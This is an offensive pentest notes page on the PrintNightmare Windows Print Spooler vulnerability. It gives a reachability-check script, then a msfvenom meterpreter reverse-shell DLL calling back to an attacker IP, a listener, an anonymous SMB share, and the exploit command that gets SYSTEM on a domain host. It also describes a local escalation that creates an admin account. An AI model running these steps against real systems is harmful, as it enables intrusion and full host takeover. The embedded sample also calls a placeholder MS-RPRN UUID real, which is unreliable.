📌 Summary

PrintNightmare (CVE-2021-1675) is a Windows Print Spooler bug: any authenticated domain user can make the spooler install a printer driver whose DLL it fetches from an attacker-controlled SMB share and loads as SYSTEM. Below: a reachability check with rpcdump.py, remote code execution with cube0x0's exploit, and the local privilege escalation variant by calebstewart.

PrintNightmare

Definition

PrintNightmare (CVE-2021-1675) is a critical vulnerability in the Windows Print Spooler service. Adding a printer driver through the spooler's RPC interface does not require administrative rights, so any authenticated domain user can make a remote spooler load an attacker-supplied driver DLL and execute arbitrary code as SYSTEM on that host. The same bug can be used locally for privilege escalation.

Proof of concept

Remote Code Execution by cube0x0

https://github.com/cube0x0/CVE-2021-1675

We can first check whether the target's Print Spooler is reachable over RPC with impacket's rpcdump.py, filtering for the two printing interfaces. If MS-RPRN or MS-PAR is listed, the spooler is running and exposed; that is a precondition for the exploit, not proof that the host is unpatched.

rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'
# Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
# Protocol: [MS-RPRN]: Print System Remote Protocol
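As an added pre-flight check (example code written for this page, not part of cube0x0's repository), the script below parses saved rpcdump.py output for the MS-RPRN and MS-PAR interfaces and, optionally, binds to the spoolss named pipe with impacket the way the exploit itself does before it calls RpcAddPrinterDriverEx. The rpcdump sample embedded in it is constructed (the interface UUIDs are the real ones, the host, ports and pipe names are made up); target, domain and credentials for the live check are placeholders.

```python
"""Pre-flight check for PrintNightmare targets (added example, not cube0x0's code).

parse_rpcdump()     - parse saved `rpcdump.py` output into {protocol: info}
print_interfaces()  - keep only the spooler interfaces MS-RPRN / MS-PAR
spooler_reachable() - bind to \\PIPE\\spoolss over SMB with impacket (live check)

A listed or bindable spooler is the precondition for the exploit; it does not
tell you whether the host is patched.
"""
import re
import sys

PRINT_INTERFACES = ("MS-RPRN", "MS-PAR")

# Constructed rpcdump.py output (abbreviated). Real interface UUIDs, made-up host.
SAMPLE_RPCDUMP = """\
Protocol: [MS-SCMR]: Service Control Manager Remote Protocol
Provider: services.exe
UUID    : 367ABB81-9844-35F1-AD32-98F038001003 v2.0
Bindings:
          ncacn_ip_tcp:192.168.1.10[49664]
          ncacn_np:\\\\DC01[\\pipe\\svcctl]

Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
          ncacn_ip_tcp:192.168.1.10[49668]
          ncacn_np:\\\\DC01[\\pipe\\spoolss]

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Provider: spoolsv.exe
UUID    : 76F03F96-CDFD-44FC-A22C-64950A001209 v1.0
Bindings:
          ncacn_ip_tcp:192.168.1.10[49668]
"""

_PROTO_RE = re.compile(r"Protocol:\s*\[([^\]]+)\]:\s*(.*)")


def parse_rpcdump(text):
    """Return {protocol_id: {"name", "uuid", "version", "bindings"}} for every named
    protocol block; 'Protocol: N/A' blocks (unknown interfaces) are skipped and
    repeated blocks for the same protocol are merged."""
    interfaces = {}
    current = None
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped:
            continue
        if stripped.startswith("Protocol:"):
            m = _PROTO_RE.match(stripped)
            if not m:                       # e.g. "Protocol: N/A"
                current = None
                continue
            current = interfaces.setdefault(
                m.group(1), {"name": m.group(2).strip(), "uuid": None,
                             "version": None, "bindings": []})
            continue
        if current is None:
            continue
        if stripped.startswith("UUID"):
            parts = stripped.split(":", 1)[1].split()
            current["uuid"] = parts[0]
            current["version"] = parts[1] if len(parts) > 1 else None
        elif stripped.startswith(("ncacn_", "ncalrpc")):
            if stripped not in current["bindings"]:
                current["bindings"].append(stripped)
    return interfaces


def print_interfaces(interfaces):
    """Subset of parse_rpcdump() output for the Print Spooler interfaces."""
    return {k: v for k, v in interfaces.items() if k in PRINT_INTERFACES}


def spooler_reachable(target, domain, username, password):
    """Live check: bind to MS-RPRN on \\PIPE\\spoolss (SMB, tcp/445) with the given
    domain credentials. True means the spooler accepts RPC from this account, which
    is exactly the bind the exploit performs first. impacket is imported lazily so
    the parser above works without it installed."""
    from impacket.dcerpc.v5 import rprn, transport
    rpctransport = transport.DCERPCTransportFactory(r"ncacn_np:%s[\PIPE\spoolss]" % target)
    rpctransport.set_credentials(username, password, domain)
    dce = rpctransport.get_dce_rpc()
    try:
        dce.connect()
        dce.bind(rprn.MSRPC_UUID_RPRN)
        return True
    except Exception as exc:          # DCERPCException, SessionError, socket errors
        print(f"[-] spoolss bind failed: {exc}", file=sys.stderr)
        return False
    finally:
        try:
            dce.disconnect()
        except Exception:
            pass


if __name__ == "__main__":
    # usage: python3 spooler_check.py [saved-rpcdump-output.txt]
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_RPCDUMP
    found = print_interfaces(parse_rpcdump(text))
    for proto, info in found.items():
        print(f"[+] {proto} ({info['name']}) uuid={info['uuid']} {info['version']}")
        for binding in info["bindings"]:
            print(f"      {binding}")
    if not found:
        print("[-] no spooler interface advertised: spooler stopped or endpoint mapper filtered")
```

Run it against `rpcdump.py @target > dump.txt`; an `ncacn_np:...[\pipe\spoolss]` binding is the one the exploit uses, while a TCP-only listing still means the spooler is up. `spooler_reachable()` is the step to try when the endpoint mapper (tcp/135) is filtered but SMB is open, since the named-pipe bind does not go through the mapper.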


You'll first need a malicious DLL. We can generate one with msfvenom or compile one ourselves, as in 2 - Service DLL Hijacking. The spooler is a 64-bit SYSTEM process, so the DLL must be x64 and the payload must run from DllMain, which executes as soon as the spooler loads the library.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.129 LPORT=5555 -f dll > shell.dll
msfconsole -x "use exploit/multi/handler;set payload windows/x64/meterpreter/reverse_tcp;set LHOST 10.0.0.129;set LPORT 5555;run;"

Then we start an SMB server so the target's spooler can fetch the payload. The share must be readable without credentials, which smbserver.py does by default (the `sudo env "PATH=$PATH"` wrapper keeps a virtualenv's impacket scripts on root's PATH):

sudo env "PATH=$PATH" smbserver.py share `pwd` -smb2support

And finally run the exploit. The first argument is domain/user:password@target (any domain user will do, since adding a printer driver does not require admin rights; `<password>` and `<target>` are placeholders), the second is the UNC path to our DLL. Inside single quotes bash does not process backslashes, so write the path the way the exploit's README does, with single backslashes:

python3 CVE-2021-1675.py orb.local/lkisaka:<password>@<target> '\\10.0.0.129\share\shell.dll'

The script first enumerates the target's installed drivers with RpcEnumPrinterDrivers to borrow a legitimate driver path, then calls RpcAddPrinterDriverEx with our DLL as the driver's data file; the spooler copies the file from our share into its local driver directory and loads it as SYSTEM. If the target cannot reach our share on tcp/445 (egress filtering, SMB signing policies), the DLL fetch fails and no code runs, so check outbound SMB from the target before blaming the exploit.

And voilà, a reverse shell running as NT AUTHORITY\SYSTEM.

Local Privilege Escalation by calebstewart

https://github.com/calebstewart/CVE-2021-1675

When we already have a shell as a low-privileged user on the host, the same bug works against the local spooler without any SMB share: this PowerShell implementation drives RpcAddPrinterDriverEx through the local spooler and, by default, creates a new local administrator account. Import the script and call Invoke-Nightmare; it also accepts a DLL of our own to load instead of the built-in add-user payload. It needs the Print Spooler service to be running on the host, so check that first with Get-Service Spooler.